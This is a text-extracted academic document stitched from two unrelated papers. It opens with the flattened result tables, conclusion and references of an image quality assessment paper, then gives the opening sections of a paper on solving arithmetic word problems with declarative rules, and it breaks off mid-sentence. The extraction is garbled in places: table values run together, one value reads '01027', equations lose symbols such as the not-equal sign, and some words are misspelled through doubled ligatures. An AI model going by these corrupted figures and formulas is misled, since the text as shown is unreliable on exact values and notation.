0.7017 0.7895 0.8329 0.5538 0.7720 0.8589 0.8542 0.8574 0.8078 0.8601 RMSE 0.8832 0.7608 0.6861 1.0322 0.7880 0.6349 0.6444 0.6547 0.7307 0.6324 TID2008 SROCC 0.5531 0.7749 0.8542 0.5675 0.7491 0.8805 0.8906 - 0.8332 0.8913 KROCC 0.4027 0.5768 0.6568 0.4236 0.5860 0.6946 0.7090 - 0.6535 0.7042 PLCC 0.5734 0.7732 0.8451 0.7340 0.8090 0.8738 0.8786 - 0.8379 0.8745 RMSE 1.0994 0.8511 0.7173 0.9113 0.7888 0.6525 0.6408 - 0.7324 0.6458 LIVE SROCC 0.8756 0.9479 0.9513 0.9259 0.9636 0.9634 0.9546 0.9601 0.9608 0.9531 KROCC 0.6865 0.7963 0.8045 0.7579 0.8282 0.8337 0.8237 0.8218 0.8312 0.8211 PLCC 0.8721 0.9449 0.9430 0.9248 0.9598 0.9597 0.9515 0.9571 0.9695 0.9379 RMSE 13.368 8.9455 9.0956 10.392 7.6734 7.6780 7.1131 7.7716 5.6639 8.0188 CSIQ SROCC 0.8058 0.8756 0.9133 0.7671 0.9195 0.9242 0.9571 0.9523 0.9369 0.9251 KROCC 0.6084 0.6907 0.7393 0.5897 0.7537 0.7567 0.8122 0.8041 0.7791 0.7575 PLCC 0.8001 0.8613 0.8998 0.8381 0.9277 0.9120 0.9543 0.9531 0.9097 0.9055 RMSE 0.1575 0.1334 0.1145 0.1432 0.0980 0.1077 0.0791 0.0799 0.1138 0.1114 IVC SROCC 0.6884 0.9018 0.8980 0.8993 0.8964 0.9262 0.8789 0.8966 0.9047 0.9103 KROCC 0.5218 0.7223 0.7203 0.7202 0.7158 0.7564 0.6882 0.7179 0.7310 0.7352 PLCC 0.7199 0.9119 0.8934 0.9080 0.9028 0.9376 0.8549 0.9190 0.9132 0.9206 RMSE 0.8456 0.4999 0.5474 0.5105 0.5239 0.4236 0.6320 0.5220 0.4965 0.4758 A57 SROCC 0.6189 0.8066 0.8394 0.3185 0.6223 0.9181 0.9103 0.9215 0.8527 0.9062 KROCC 0.4309 0.6058 0.6478 0.2378 0.4589 0.7639 0.7513 0.7782 0.6604 0.7289 PLCC 0.6587 0.8017 0.8504 0.4548 0.6158 0.9252 0.9085 0.9429 0.8528 0.8530 RMSE 0.1849 0.1469 0.1293 0.2189 0.1936 0.0933 01027 0.0813 0.0707 0.1283 TABLE II. COMPARISON SROCC FOR INDIVIDUAL DISTORTION OF TEN IQA METRICS ON TID2013 DATABASE. THE FIRST TWO ARE MARKED IN BOLD Database Distortion type PSNR SSIM (2004) MS-SSIM (2003) IFC (2005) VIF (2006) FSIM (2011) GMSD (2014) DASM (2017) SSRM (2018) Proposed TID2013 Awgn 0.9291 0.8671 0.8646 0.6612 0.8994 0.8973 0.9461 0.9299 0.8545 0.9293 Awgn-color 0.8986 0.7726 0.7730 0.5352 0.8299 0.8208 0.8689 08612 0.7757 0.8463 Spatial-correlated 0.9197 0.8515 0.8544 0.6601 0.8835 0.8750 0.9348 0.9301 0.8392 0.9178 Mask-noise 0.8321 0.7767 0.8073 0.6932 0.8450 0.7944 0.7085 0.8019 0.8184 0.8068 HF-noise 0.9140 0.8634 0.8604 0.7406 0.8972 0.8984 0.9164 0.9179 0.8754 0.9069 Impulse-noise 0.8969 0.7503 0.7629 0.6408 0.8537 0.8072 0.7633 0.8550 0.7872 0.8336 Quantization-noise 0.8801 0.8657 0.8706 0.6282 0.7854 0.8719 0.9057 0.9032 0.8496 0.8629 GB 0.9155 0.9668 0.9673 0.8907 0.9650 0.9551 0.9114 0.9546 0.9674 0.9686 Denoising 0.9481 0.9254 0.9268 0.7779 0.8911 0.9302 0.9525 0.9496 0.9288 0.9361 JPEG 0.9189 0.9200 0.9265 0.8357 0.9192 0.9324 0.9500 0.9473 0.9287 0.9515 JP2K 0.8840 0.9468 0.9504 0.9078 0.9516 0.9577 0.9656 0.9620 0.9562 0.9635 JPEG-trans-error 0.7682 0.8493 0.8475 0.7425 0.8409 0.8464 0.8401 0.8534 0.8369 0.8802 JP2K-trans-error 0.8886 0.8828 0.8889 0.7769 0.8761 0.8913 0.9135 0.8966 0.8765 0.9141 Pattern-noise 0.6864 0.7821 0.7968 0.5737 0.7720 0.7917 0.8143 0.8138 0.7745 0.7632 Block-distortion 0.1552 0.5720 0.4801 0.2414 0.5306 0.5489 0.6630 0.6338 0.3186 0.6635 Mean-shift 0.7671 0.7752 0.7906 0.5522 0.6276 0.7531 0.7356 0.6127 0.6919 0.6143 Contrast change 0.4416 0.3775 0.4634 -0.1798 0.8386 0.4686 0.3253 0.3498 0.4519 0.4889 Saturation change 0.0944 -0.4141 -0.4099 -0.4029 -0.3099 -0.2748 -0.1907 0.0382 -0.2513 -0.2602 Multiple-noise 0.8911 0.7803 0.7786 0.61423 0.8468 0.8469 0.8880 0.8814 0.8067 0.8698 Comfort-noise 0.8410 0.8566 0.8528 0.81620 0.8946 0.9121 0.9298 0.9203 0.8921 0.9112 Noisy-compression 0.9144 0.9057 0.9068 0.8180 0.9204 0.9466 0.9631 0.9402 0.9164 0.9367 Color quantization 0.9269 0.8542 0.8555 0.6006 0.8414 0.8760 0.9098 0.9177 0.8546 0.8952 Chromatic abbr. 0.8871 0.8775 0.8784 0.8210 0.8848 0.8715 0.8517 0.8693 0.8844 0.8849 Sparse sample 0.9044 0.9461 0.9483 0.8885 0.9353 0.9565 0.9684 0.9669 0.9541 0.9601 International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 33 Among the six databases, TID2013 has the highest number of distorted types. Table Ⅱ lists the SROCC results of ten metrics about each individual distorted type of the TID2013 database. The proposed algorithm performs well in variety of distortion types. In particular, the proposed algorithm is outstanding for JPEG, JP2K and JPEG-trans-error distortion types that are sensitive to variations. IV. CONCLUSION In this paper, we discuss the problem of whether the change measured by the gradient correspond to the change perceived by the HVS. Considering that the ability of the HVS to perceive changes is affected by the upper threshold, we defined the adaptively truncating gradient and proposed a novel IQA index. Numerical experimental results showed that this index performs well on multiple databases. In addition, more studies need to be conducted to address this problem due to its complexity. In future research, we expect to using machine learning methods to further understand this issue. ACKNOWLEDGMENT This work was supported by the Natural Science Foundation of Shaanxi Province under Grant 2020JM- 509. REFERENCES [1] Z. Wang, A. C. Bovik, H. R. Sheikh, and E. P. Simoncelli, “Image quality assessment: From error visibility to structural similarity,” IEEE Trans. Image Process., vol. 13, no. 4, pp. 600–612, Apr. 2004. [2] L. Zhang, L. Zhang, X. Mou, and D. Zhang, “FSIM: A feature similarity index for image quality assessment,” IEEE Trans. Image Process., vol. 20, no. 8, pp. 2378–2386, Aug. 2011. [3] W. Xue, L. Zhang, X. Mou, and A. C. Bovik, “Gradient magnitude similarity deviation: A highly effificient perceptual image quality index,” IEEE Trans. Image Process., vol. 23, no. 2, pp. 684–695, Feb. 2014. [4] W. Sun, Q. Liao, J. Xue, and F. Zhou, “SPSIM: A superpixel-based similarity index for full-reference image quality assessment,” IEEE Trans. Image Process., vol. 27, no. 9, pp. 4232–4244, Sept. 2018. [5] L. Ding, H. Huang, and Y. Zang, “Image quality assessment using directional anisotropy structure measurement,” IEEE Trans. Image Process., vol. 24, no. 4, pp. 1799–1809, Apr. 2017. [6] X. Zhang, X. Feng, W. Wang, and W. Xue, “Edge strength similarity for image quality assessment,” IEEE Signal Process. Lett., vol. 20, no. 4, pp. 319–322, Apr. 2013. [7] Z. Wang and A. C. Bovik, “Bottom-up approaches for full-reference image quality assessment ,” in Modern image quality assessment, Vermont, VT, USA: Morgan and Claypool, 2006, pp. 17–40. [8] H. R. Sheikh, A. C. Bovik, and G. de Veciana, “An information fifidelity criterion for image quality assessment using natural scene statistics,” IEEE Trans. Image Process., vol. 14, no. 12, pp. 2117– 2128, Dec. 2005. [9] H. R. Sheikh and A. C. Bovik, “Image information and visual quality,” IEEE Trans. Image Process., vol. 15, no. 12, pp. 430–444, Feb. 2006. [10] Z. Wang, E. P. Simoncelli, and A. C. Bovik, “Multi-scale structural similarity for image quality assessment,” in Proc. IEEE Asilomar Conf. Signals, Syst. Comput., Nov. 2003, pp. 1398–1402. [11] A. Ahar, A. Barri and P. Schelkens, "From Sparse Coding Significance to Perceptual Quality: A New Approach for Image Quality Assessment," IEEE Trans. Image Process., vol. 27, no. 2, pp. 879-893, Feb. 2018. [12] N. Ponomarenko, O. Ieremeiev, V. Lukin, K. Egiazarian, L. Jin, J, Astola, B. Vozel, K. Chehdi, M. Carli, F. Battisti, and C.-C. Jay Kuo, “Color image database TID2013: Peculiarities and preliminary results,” in Proc. 4th Eur. Workshop Vis. Inf. Process., Jun. 2013, pp. 106–111. [13] N. Ponomarenko, V. Lukin, A. Zelensky, K. Egiazarian, M. Carli, and F. Battisti, “TID2008A database for evaluation of full-reference visual quality assessment metrics,” Adv. Modern Radioelectron., vol. 10, pp. 30–45, May. 2009. [14] C. Larson and D. M. Chandler, Categorical Image Quality (CSIQ) Database 2009 [Online]. Available: http://vision.okstate.edu/csiq [15] H. R. Sheikh, K. Seshadrinathan, A. K. Moorthy, Z. Wang, A. C. Bovik, and L. K. Cormack, Image and Video Quality Assessment Research at LIVE 2004 [Online]. Available: http://live.ece.utexas.edu /research /quality [16] A. Ninassi, P. Le Callet, and F. Autrusseau, Subjective Quality Assessment IVC Database 2005 [Online]. Available: http://www2.irccyn. ecnantes.fr/ivcdb [17] D. M. Chandler and S. S. Hemami, A57 Database 2007 [Online]. Available: http://foulard.ece.cornell.edu/dmc27/vsnr/vsnr.htm work_mxer45347banlgbuvlsc43gz5m ---- Mapping to Declarative Knowledge for Word Problem Solving Subhro Roy∗ Massachusetts Institute of Technology subhro@csail.mit.edu Dan Roth∗ University of Pennsylvania danroth@seas.upenn.edu Abstract Math word problems form a natural abstrac- tion to a range of quantitative reasoning prob- lems, such as understanding financial news, sports results, and casualties of war. Solving such problems requires the understanding of several mathematical concepts such as dimen- sional analysis, subset relationships, etc. In this paper, we develop declarative rules which govern the translation of natural language de- scription of these concepts to math expres- sions. We then present a framework for in- corporating such declarative knowledge into word problem solving. Our method learns to map arithmetic word problem text to math ex- pressions, by learning to select the relevant declarative knowledge for each operation of the solution expression. This provides a way to handle multiple concepts in the same prob- lem while, at the same time, supporting in- terpretability of the answer expression. Our method models the mapping to declarative knowledge as a latent variable, thus remov- ing the need for expensive annotations. Exper- imental evaluation suggests that our domain knowledge based solver outperforms all other systems, and that it generalizes better in the realistic case where the training data it is ex- posed to is biased in a different way than the test data. 1 Introduction Many natural language understanding situations re- quire reasoning with respect to numbers or quanti- ∗Most of the work was done when the authors were at the University of Illinois, Urbana Champaign. ties – understanding financial news, sports results, or the number of casualties in a bombing. Math word problems form a natural abstraction to a lot of these quantitative reasoning problems. Conse- quently, there has been a growing interest in devel- oping automated methods to solve math word prob- lems (Kushman et al., 2014; Hosseini et al., 2014; Roy and Roth, 2015). Arithmetic Word Problem Mrs. Hilt baked pies last weekend for a holiday din- ner. She baked 16 pecan pies and 14 apple pies. If she wants to arrange all of the pies in rows of 5 pies each, how many rows will she have? Solution (16 + 14)/5 = 6 Math Concept needed for Each Operation Figure 1: An example arithmetic word problem and its solution, along with the concepts required to generate each operation of the solution Understanding and solving math word problems involves interpreting the natural language descrip- tion of mathematical concepts, as well as under- standing their interaction with the physical world. Consider the elementary school level arithmetic word problem shown in Fig 1. To solve the prob- lem, one needs to understand that “apple pies” and “pecan pies” are kinds of “pies”, and hence, the 159 Transactions of the Association for Computational Linguistics, vol. 6, pp. 159–172, 2018. Action Editor: Luke Zettlemoyer. Submission batch: 10/2017; Revision batch: 12/2017; Published 3/2018. c©2018 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. number of apple pies and pecan pies needs to be summed up to get the total number of pies. Simi- larly, detecting that “5” represents “the number of pies per row” and applying dimensional analysis or unit compatibility knowledge, helps us infer that the total number of pies needs to be divided by 5 to get the answer. Besides part-whole relationship and dimensional analysis, there are several other con- cepts that are needed to support reasoning in math word problems. Some of these involve understand- ing comparisons, transactions, and the application of math or physics formulas. Most of this knowledge can be encoded as declarative rules, as illustrated in this paper. This paper introduces a framework for incorpo- rating this “declarative knowledge” into word prob- lem solving. We focus on arithmetic word prob- lems, whose solution can be obtained by combin- ing the numbers in the problem with basic opera- tions (addition, subtraction, multiplication or divi- sion). For combining a pair of numbers or math sub- expressions, our method first predicts the math con- cept that is needed for it (e.g., subset relationship, di- mensional analysis, etc.), and then predicts a declar- ative rule under that concept to infer the mathemati- cal operation. We model the selection of declarative rules as a latent variable, which removes the need for expensive annotations for the intermediate steps. The proposed approach has some clear advan- tages compared to existing work on word problem solving. First, it provides interpretability of the so- lution, without expensive annotations. Our method selects a declarative knowledge based inference rule for each operation needed in the solution. These rules provide an explanation for the operations per- formed. In particular, it learns to select relevant rules without explicit annotations for them. Second, each individual operation in the solution expression can be generated independently by a separate mathemat- ical concept. This allows our method to handle mul- tiple concepts in the same problem. We show that existing datasets of arithmetic word problems suffer from significant vocabulary biases and, consequently, existing solvers do not do well on conceptually similar problems that are not biased in the same way. Our method, on the other hand, learns the right abstractions even in the presence of biases in the data. We also introduce a novel approach to gather word problems without these biases, creating a new dataset of 1492 problems. The next section discusses related work. We next introduce the mathematical concepts required for arithmetic word problems, as well as the declara- tive rules for each concept. Section 4 describes our model – how we predict answers using declarative knowledge – and provides the details of our train- ing paradigm. Finally, we provide an experimental evaluation of our proposed method in Section 6, and then conclude with a discussion of future work. 2 Related Work Our work is primarily related to three major strands of research - automatic word problem solving, se- mantic parsing, and approaches incorporating back- ground knowledge in learning. 2.1 Automatic Word Problem Solving There has been a growing interest in automatically solving math word problems, with various systems focusing on particular types of problems. These can be broadly categorized into two types: arithmetic and algebra. Arithmetic Word Problems Arithmetic problems involve combining numbers with basic operations (addition, subtraction, multiplication and division), and are generally directed towards elementary school students. Roy and Roth (2015), Roy and Roth (2017) and this work focus on this class of word problems. The works of Hosseini et al. (2014) and Mitra and Baral (2016) focus on arithmetic prob- lems involving only addition and subtraction. Some of these approaches also try to incorporate some form of declarative or domain knowledge. Hosseini et al. (2014) incorporates the transfer phenomenon by classifying verbs; Mitra and Baral (2016) maps problems to a set of formulas. Both require exten- sive annotations for intermediate steps (verb classi- fication for Hosseini et al. (2014), alignment of num- bers to formulas for Mitra and Baral (2016), etc). In contrast, our method can handle a more general class of problems, while training only requires problem- equation pairs coupled with rate component anno- tations. Roy and Roth (2017) focuses only on us- ing dimensional analysis knowledge, and handles the same class of problems as we do. In contrast, 160 our method provides a framework for including any form of declarative knowledge, exemplified here by incorporating common concepts required for arith- metic problems. Algebra Word Problems Algebra word problems are characterized by the use of (one or more) variables in contructing (one or more) equations. These are typically middle or high school problems. Koncel-Kedziorski et al. (2015) looks at single equa- tion problems, and Shi et al. (2015) focuses on num- ber word problems. Kushman et al. (2014) intro- duces a template based approach to handle general algebra word problems and several works have later proposed improvements over this approach (Zhou et al., 2015; Upadhyay et al., 2016; Huang et al., 2017). There has also been work on generating ra- tionale for word problem solving (Ling et al., 2017). More recently, some focus turned to pre-university exam questions (Matsuzaki et al., 2017; Hopkins et al., 2017), which requires handling a wider range of problems and often more complex semantics. 2.2 Semantic Parsing Our work is also related to learning semantic parsers from indirect supervision (Clarke et al., 2010; Liang et al., 2011). The general approach here is to learn a mapping of sentences to logical forms, with the only supervision being the response of executing the log- ical form on a knowledge base. Similarly, we learn to select declarative rules from supervision that only includes the final operation (and not which rule gen- erated it). However, in contrast to the semantic pars- ing work, in our case the selection of each declar- ative rule usually requires reasoning across multi- ple sentences. Further, we do not require an explicit grounding of words or phrases to logical variables. 2.3 Background Knowledge in Learning Approaches to incorporate knowledge in learning started with Explanation Based Learning (EBL) (DeJong, 1993; DeJong, 2014). EBL uses domain knowledge based on observable predicates, whereas we learn to map text to predicates of our declara- tive knowledge. More recent approaches tried to in- corporate knowledge in the form of constraints or expectations from the output (Roth and Yih, 2004; Chang et al., 2007; Chang et al., 2012; Ganchev et al., 2010; Smith and Eisner, 2006; Naseem et al., 2010; Bisk and Hockenmaier, 2012; Gimpel and Bansal, 2014). Finally, we note that there has been some work in the context of Question Answering on perturbing questions or answers as a way to test or assure the robustness, or lack of, the approach (Khashabi et al., 2016; Jia and Liang, 2017). We make use of similar ideas in order to generate an unbiased test set for Math word problems (Sec. 6). 3 Knowledge Representation Here, we introduce our representation of domain knowledge. We organize the knowledge hierarchi- cally in two levels – concepts and declarative rules. A math concept is a phenomenon which needs to be understood to apply reasoning over quantities. Ex- amples of concepts include part-whole relations, di- mensional analysis, etc. Under each concept, there are a few declarative rules, which dictate which op- eration is needed in a particular context. An exam- ple of a declarative rule under the part-whole con- cept can be that “if two numbers quantify “parts” of a larger quantity, the operation between them must be addition”. These rules use concept specific pred- icates, which we exemplify in the following subsec- tions. Since this work focuses on arithmetic word prob- lems, we consider 4 math concepts which are most common in these problems, as follows: 1. Transfer: This involves understanding the transfer of objects from one person to another. For example, the action described by the sen- tence “Tim gave 5 apples to Jim”, results in Tim losing “5 apples” and Jim gaining “5 apples”. 2. Dimensional Analysis: This involves under- standing compatibility of units or dimensions. For example, “30 pies” can be divided by “5 pies per row” to get the number of rows. 3. Part-Whole Relation: This includes asserting that if two numbers quantify parts of a larger quantity, they are to be added. For example, the problem in Section 1 involves understand- ing “pecan pies” and “apple pies” are parts of “pies”, and hence must be added. 4. Explicit Math: Word problems often mention explicit math relationships among quantities or 161 entities in the problem. For example, “Jim is 5 inches taller than Tim”. This concept captures the reasoning needed for such relationships. Each of these concepts comprises a small number of declarative rules which determine the math oper- ations; we describe them below. 3.1 Transfer Consider the following excerpt of a word problem exhibiting a transfer phenomenon: “Stephen owns 5 books. Daniel gave him 4 books.” The goal of the declarative rules is to determine which operation is required between 5 and 4, given that we know that a transfer is taking place. We note that a transfer usu- ally involves two entities, which occurs as subject and indirect object in a sentence. The direction of transfer is determined by the verbs associated with the entities. We define a set of variables to denote these properties; we define as Subj1, Verb1, IObj1 the subject, verb and indirect object associated with the first number, and as Subj2, Verb2, IObj2 the sub- ject, verb and indirect object related to the second number. For the above example, the assignment of the variables are shown below: [Stephen]Subj1 [owns]V erb1 5 books. [Daniel]Subj2 [gave]V erb2 [him]IObj2 4 books. In order to determine the direction of the transfer, we require some classification of verbs. In partic- ular, we classify each verb into one of five classes: HAVE, GET, GIVE, CONSTRUCT and DESTROY. The HAVE class consists of all verbs which sig- nify the state of an entity, such as “have”, “own”, etc. The GET class contains verbs which indicate the gaining of things for the subject. Examples of such verbs are “acquire”, “borrow”, etc. The GIVE class contains verbs which indicate the loss of things for the subject. Verbs like “lend”, “give” belong to this class. Finally CONSTRUCT class consti- tutes verbs indicating construction or creation, like “build”, “fill”, etc., while DESTROY verbs indi- cate destruction related verbs like “destroy”, “eat”, “use”, etc. This verb classification is largely based on the work of Hosseini et al. (2014). Finally, the declarative rules for this concept have the following form: [Verb1 ∈ HAVE] ∧ [Verb2 ∈ GIVE] ∧ [Coref(Subj1, IObj2)] ⇒ Addition where Coref(A,B) is true when A and B repre- sent the same entity or are coreferent, and is false otherwise. In the examples above, Verb1 is “own” and hence [Verb1 ∈ HAVE] is true. Verb2 is “give” and hence [Verb2 ∈ GIVE] is true. Fi- nally, Subj1 and IObj2 both refer to Stephen, so [Coref(Subj1, IObj2)] returns true. As a result, the above declarative rule dictates that addition should be performed between 5 and 4. We have 18 such inference rules for transfer, cov- ering all combinations of verb classes and Coref() values. All these rules generate addition or subtrac- tion operations. 3.2 Dimensional Analysis We now look at the use of dimensional analysis knowledge in word problem solving. To use di- mensional analysis, one needs to extract the units of numbers as well as the relations between the units. Consider the following excerpt of a word problem: “Stephen has 5 bags. Each bag has 4 apples. Know- ing that the unit of 5 is “bag” and the effective unit of 4 is “apples per bag”, allows us to infer that the numbers can be multiplied to obtain the total number of apples. To capture these dependencies, we first introduce a few terms. Whenever a number has a unit of the form “A per B”, we refer to “A” as the unit of the number, and refer to “B” as the rate component of the number. In our example, the unit of 4 is “apple”, and the rate component of 4 is “bag”. We define variables Unit1 and Rate1 to denote the unit and the rate component of the first number respectively. We similarly define Unit2 and Rate2. For the above ex- ample, the assignment of variables is shown below: Stephen has 5 [bags]Unit1. Each [bag]Rate2 has 4 [apples]Unit2. Finally, the declarative rule applicable for our exam- ple has the following form: 162 [Coref(Unit1, Rate2)] ⇒ Multiplication We only have 3 rules for dimensional analysis. They generate multiplication or division operations. 3.3 Explicit Math In this subsection, we want to capture the reasoning behind explicit math relationships expressed in word problems such as the one described in: “Stephen has 5 apples. Daniel has 4 more apples than Stephen”. We define Math1 and Math2 by any explicit math term associated with the first and second numbers respectively. As was the case for transfers, we also define Subj1, IObj1, Subj2, and IObj2 to denote the entities participating in the math relationship. The assignment of these variables in our example is: [Stephen]Subj1 has 5 apples. [Daniel]Subj2 has 4 [more apples than]Math2 [Stephen]IObj2. We classify explicit math terms into one of three classes - ADD, SUB and MUL. ADD comprises terms for addition, like “more than”, “taller than” and “heavier than”. SUB consists of terms for sub- traction like“less than”, “shorter than”, etc., and MUL contains terms indicating multiplication, like “times”, “twice” and “thrice”. Finally, the declara- tive rule that applies for our example is: [Coref(Subj1, IObj2)] ∧ [Math2 ∈ ADD] ⇒ Addition. We have only 7 rules for explicit math. 3.4 Part-Whole Relation Understanding part-whole relationships entails un- derstanding whether two quantities are hyponym, hypernym or siblings (that is, co-hyponym, or parts of the same quantity). For example, in the excerpt “Mrs. Hilt has 5 pecan pies and 4 apple pies”, de- termining that pecan pies and apple pies are parts of all pies, helps infer that addition is needed. We have 3 simple rules which directly map from Hyponym, Hypernym or Sibling detection to the corresponding math operation. For the above example, the applica- ble declarative rule is: [Sibling(Number1, Number2)] ⇒ Addition The rules for the part-whole concept can generate addition and subtraction operations. Table 1 gives a list of all the declarative rules. Note that all the declarative rules are designed to determine an op- eration between two numbers only. We introduce a strategy in Section 4, which facilitates combining sub-expressions with these rules. 4 Mapping of Word Problems to Declarative Knowledge Given an input arithmetic word problem x, the goal is to predict the math expression y, which generates the correct answer. In order to derive the expres- sion y from the word problem x, we leverage math concepts and declarative rules that we introduced in Section 3. In order to combine two numbers men- tioned in x, we first predict a concept k, and then we choose a declarative knowledge rule r from k. The rule r generates the math operation needed to com- bine the two numbers. Consider the first example in Table 2. To combine 6 and 9, we first decide on the transfer concept, and then choose an appropriate rule under the transfer to generate the operation. Next we need to combine the sub-expression (6 + 9) with the number 3. However, our inference rules were designed for the combination of two num- bers only. In order to combine a sub-expression, we choose a representative number from the sub- expression, and use that number to determine the operation. In our example, we choose the number 6 as the representative number for (6 + 9), and decide the operation between 6 and 3, following a similar procedure as before. This operation is now used to combine (6 + 9) and 3. The representative number for a sub-expression is chosen such that it preserves the reasoning needed for the combination of this sub-expression with other numbers. We follow a heuristic to choose a representative number from a sub-expression: 1. For transfers and part-whole relationships, we choose the representative number of the left subtree. 2. In the case of rate relationship, we choose the number which does not have a rate component. 163 Transfer [Verb1 ∈ HAVE] ∧ [Verb2 ∈ HAVE] ∧ [Coref(Subj1, Subj2)] ⇒− [Verb1 ∈ HAVE] ∧ [Verb2 ∈ (GET ∪ CONSTRUCT)] ∧ [Coref(Subj1, Subj2)] ⇒ + [Verb1 ∈ HAVE] ∧ [Verb2 ∈ (GIVE ∪ DESTROY)] ∧ [Coref(Subj1, Subj2)] ⇒− [Verb1 ∈ (GET ∪ CONSTRUCT)] ∧ [Verb2 ∈ HAVE] ∧ [Coref(Subj1, Subj2)] ⇒− [Verb1 ∈ (GET ∪ CONSTRUCT)] ∧ [Verb2 ∈ (GET ∪ CONSTRUCT)] ∧ [Coref(Subj1, Subj2)] ⇒ + [Verb1 ∈ (GET ∪ CONSTRUCT)] ∧ [Verb2 ∈ (GIVE ∪ DESTROY)] ∧ [Coref(Subj1, Subj2)] ⇒− [Verb1 ∈ (GIVE ∪ DESTROY)] ∧ [Verb2 ∈ HAVE] ∧ [Coref(Subj1, Subj2)] ⇒ + [Verb1 ∈ (GIVE ∪ DESTROY)] ∧ [Verb2 ∈ (GET ∪ CONSTRUCT)] ∧ [Coref(Subj1, Subj2)] ⇒− [Verb1 ∈ (GIVE ∪ DESTROY)] ∧ [Verb2 ∈ (GIVE ∪ DESTROY)] ∧ [Coref(Subj1, Subj2)] ⇒ + We also have another rule for each rule above, which states that if Coref(Subj1, Obj2) or Coref(Subj2, Obj1) is true, and none of the verbs is CONSTRUCT or DESTROY, the final operation is changed from addition to subtraction, or vice versa. Dimensionality Analysis [Coref(Unit1, Rate2) ∨ Coref(Unit2, Rate1)] ⇒× [Coref(Unit1, Unit2)] ∧ [Rate2 6= null] ⇒÷ [Coref(Unit1, Unit2)] ∧ [Rate1 6= null] ⇒÷ (Reverse order) Explicit Math [Coref(Subj1, IObj2) ∨ Coref(Subj2, IObj1)] ∧ [Math1 ∈ ADD ∨ Math2 ∈ ADD] ⇒ + [Coref(Subj1, IObj2) ∨ Coref(Subj2, IObj1)] ∧ [Math1 ∈ SUB ∨ Math2 ∈ SUB] ⇒− [Coref(Subj1, Subj2)] ∧ [Math1 ∈ ADD ∨ Math2 ∈ ADD] ⇒− [Coref(Subj1, Subj2)] ∧ [Math1 ∈ SUB ∨ Math2 ∈ SUB] ⇒ + [Coref(Subj1, Subj2)] ∧ [Math1 ∈ MUL] ⇒÷ (Reverse order) [Coref(Subj1, Subj2)] ∧ [Math2 ∈ MUL] ⇒÷ [Coref(Subj1, IObj2) ∨ Coref(Subj2, IObj1)] ∧ [Math1 ∈ MUL ∨ Math2 ∈ MUL] ⇒× Part-Whole Relationship [Sibling(Number1, Number2)] ⇒ + [Hyponym(Number1, Number2)] ⇒− [Hypernym(Number1, Number2)] ⇒− Table 1: List of declarative rules used in our system. ÷ (reverse order) indicates the second number being divided by the first. To determine the order of subtraction, we always subtract the smaller number from the larger number. 3. In the case of explicit math, we choose the number which is not directly associated with the explicit math expression. 4.1 Scoring Answer Derivations Given the input word problem x, the solution math expression y is constructed by combining numbers in x with operations. We refer to the set of opera- tions used in an expression y as �(y). Each opera- tion o in �(y) is generated by first choosing a con- cept ko, and then selecting a declarative rule ro from that concept. In order to discriminate between multiple candi- date solution expressions of a word problem x, we score them using a linear model over features ex- tracted from the derivation of the solution. Our scor- ing function has the following form: SCORE(x,y) = ∑ o∈�(y) wkφk(x,k o) + wrφr(x,r o) where φk(x,ko) and φr(x,ro) are feature vectors re- lated to concept ko, and declarative rule ro, respec- tively, and wk and wr are the corresponding weight vectors. The term wkφk(x,ko) is the score for the selection of ko, and the term wrφr(x,ro) is the score for the selection of ro. Finally, the total score is the sum of the scores of all concepts and rule choices, over all operations of y. 164 Word Problem Tim ’s cat had 6 kittens . He gave 3 to Jessica. Then Sara gave him 9 kittens . How many kittens does he now have ? Knowledge based Answer Derivation Word Problem Mrs. Hilt baked pies last weekend for a holiday dinner. She baked 16 pecan pies and 14 apple pies. If she wants to arrange all of the pies in rows of 5 pies each, how many rows will she have? Knowledge based Answer Derivation Table 2: Two examples of arithmetic word problems, and derivation of the answer. For each combination, first a math concept is chosen, and then a declarative rule from that concept is chosen to infer the operation. 4.2 Learning We wish to estimate the parameters of the weight vectors wk and wr, such that our scoring function assigns a higher score to the correct math expres- sion, and a lower score to other competing math expressions. For learning the parameters, we as- sume access to word problems paired with the cor- rect math expression. In Section 5, we show that certain simple heuristics and rate component anno- tations can be used to create somewhat noisy anno- tations for the concepts needed for individual op- erations. Hence, we will assume for our formu- lation access to concept supervision as well. We thus assume access to m examples of the following form: {(x1,y1,{ko}o∈�(y1)), (x2,y2,{ko}o∈�(y2)), . . . , (xm,ym,{ko}o∈�(ym))}. We do not have any supervision for declarative rule selection, which we model as a latent variable. Two Stage Learning: A straightforward solution for our learning problem could be to jointly learn wk and wr using latent structured SVM. However, we found that this model does not perform well. In- stead, we chose a two stage learning protocol. At the first stage, we only learn wr, the weight vector for scoring the declarative rule choice. Once learned, we fix the parameters for wr, and then learn the pa- rameters for wk. In order to learn the parameters for wr, we solve: min wr 1 2 ||wr||2 + C m∑ i=1 ∑ o∈�(yi) [ max r̂∈ko,r̂⇒ô wr ·φr(x, r̂)+ ∆(ô,o) ] − max r̂∈ko,r̂⇒o wr ·φr(x, r̂), where r̂ ∈ ko implies that r̂ is a declarative rule for concept ko, r̂ ⇒ o signifies that the declarative rule r̂ generates operation o, and ∆(ô,o) represents a measure of dissimilarity between operations o and ô. The above objective is similar to that of latent structured SVM. For each operation o in the solu- tion expression yi, the objective tries to minimize the difference between the highest scoring rule from its concept ko, and highest scoring rule from ko which explains or generates the operation o. Next we fix the parameters of wr, and solve: min wk 1 2 ||wk||2 + C m∑ i=1 max y∈Y [SCORE(xi,y) + ∆(y,yi)] − SCORE(xi,yi). 165 This is equivalent to a standard structured SVM ob- jective. We use a 0 − 1 loss for ∆(ô,o). Note that fixing the parameters of wr determines the scores for rule selection, removing the need for any latent variables at this stage. 4.3 Inference Given an input word problem x, inferring the best math expression involves computing arg maxy∈Y SCORE(x,y), where Y is the set of all math expressions that can be created by combining the numbers in x with basic math operations. The size of Y is exponential in the number of quantities mentioned in x. As a result, we perform approximate inference using beam search. We ini- tialize the beam with the set E of all numbers men- tioned in the problem x. At each step of the beam search, we choose two numbers (or sub-expressions) e1 and e2 from E, and then select a math concept and a declarative rule to infer an operation o. We cre- ate a new sub-expression e3 by combining the sub- expressions e1 and e2 with operation o. We finally create a new set E′ from E, by removing e1 and e2 from it, and adding e3 to it. We remove E from the beam, and add all such modified sets E′ to the beam. We continue this process until all sets in the beam have only one element in them. We choose the highest scoring expression among these elements as the solution expression. 5 Model and Implementation Details 5.1 Supervision Each word problem in our dataset is annotated with the solution math expression, along with alignment of numbers from the problem to the solution expres- sion. In addition, we also have annotations for the numbers which possess a rate component. An ex- ample is shown in Fig 2. This is the same level of 